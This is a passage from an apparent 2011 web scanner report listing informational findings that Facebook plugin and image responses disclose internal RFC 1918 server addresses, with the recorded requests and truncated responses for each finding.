3d598&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df35ab75aa%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df224684e0%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.131
X-Cnection: close
Date: Thu, 12 May 2011 13:30:49 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
17.55. http://www.facebook.com/images/fb_logo_small.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/fb_logo_small.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/fb_logo_small.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Sat, 11 Jun 2011 13:30:51 GMT
X-FB-Server: 10.27.55.120
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 540

.PNG
.
...IHDR...O..........k1....`PLTEOj.;Y....Ie.|..\v....l..r.............................Rn...................f}.....................b....wIDATx^.....0.E#yw.....9.0.&..%.s...B.T.....O......n...
...[SNIP]...
17.56. http://www.facebook.com/images/icons/fbpage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/icons/fbpage.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/icons/fbpage.gif HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/gif
Expires: Sat, 11 Jun 2011 13:30:51 GMT
X-Powered-By: HPHP
X-FB-Server: 10.27.54.127
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 898

GIF89a.......W.....c./.....b..:..s...p^P..P.\...........................................................................................................................................................
...[SNIP]...
17.57. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=examiner.com&width=300&height=350&header=true&colorscheme=light&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.7.119
X-Cnection: close
Date: Thu, 12 May 2011 13:33:00 GMT
Elapsed: 0.044
Content-Length: 14079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.58. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.77.109
X-Cnection: close
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Length: 13301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.59. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=qo83J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.23.130
X-Cnection: close
Date: Thu, 12 May 2011 13:33:38 GMT
Elapsed: 0.060
Content-Length: 15491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.60. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df200f7a838%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&layout=box_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=55 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.84.110
X-Cnection: close
Date: Thu, 12 May 2011 13:30:03 GMT
Content-Length: 9146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.61. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=40 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.215.129
X-Cnection: close
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 8926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.62. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df31fd403fc%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=625 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.87.132
X-Cnection: close
Date: Thu, 12 May 2011 13:30:13 GMT
Content-Length: 11756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.63. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=119251788156770&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfa8566ab8%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.25.110
X-Cnection: close
Date: Thu, 12 May 2011 13:33:05 GMT
Elapsed: 0.041
Content-Length: 8438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.64. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://crenk.com/buy-chromebook/&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.65.130
X-Cnection: close
Date: Thu, 12 May 2011 13:28:45 GMT
Content-Length: 8495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.65. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df354118be%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2Fmashable&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=286 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.58.127
X-Cnection: close
Date: Thu, 12 May 2011 13:29:05 GMT
Content-Length: 9425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.66. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.53.116
X-Cnection: close
Date: Thu, 12 May 2011 13:31:58 GMT
Content-Length: 6649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.67. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&layout=button_count&show_faces=false&width=90&action=like&font=tahoma&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.221.126
X-Cnection: close
Date: Thu, 12 May 2011 13:30:19 GMT
Content-Length: 6656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.68. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2FGizmodoAustralia&layout=button_count&show_faces=true&width=90&action=like&font=tahoma&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.80.104
X-Cnection: close
Date: Thu, 12 May 2011 13:29:16 GMT
Content-Length: 6502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.69. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

